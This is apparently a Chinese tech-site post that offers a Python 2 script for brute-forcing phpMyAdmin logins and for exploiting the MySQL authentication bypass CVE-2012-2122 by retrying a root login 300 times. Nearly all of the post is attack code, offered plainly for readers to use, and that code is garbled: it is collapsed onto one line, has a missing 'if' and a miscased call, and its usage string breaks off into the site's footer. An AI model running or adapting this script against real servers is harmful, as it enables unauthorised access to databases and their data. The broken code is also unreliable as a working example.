这篇文章主要介绍了Python写的PHPMyAdmin暴力破解工具代码,同时涉及了CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞的利用,需要的朋友可以参考下
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。
#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} params = urllib.urlencode({'pma_username': username, 'pma_password': password}) request = urllib2.Request(url+"/index.php", params,headers) response = opener.open(request) a=response.read() if a.find('Database server')!=-1 and a.find('name="login_form"')==-1: return username,password return 0 def MySQLAuthenticationBypassCheck(host,port): i=0 while i<300: i=i+1 subprocess.popen("mysql --host=%s -p %s -uroot -piswin" % (host,port),shell=True).wait() if __name__== '__main__': len(sys.argv)<4: print "#author:iswin\n#useage python pma.py https:>以上就是Python写的PHPMyAdmin暴力破解工具代码的详细内容,更多请关注0133技术站其它相关文章!
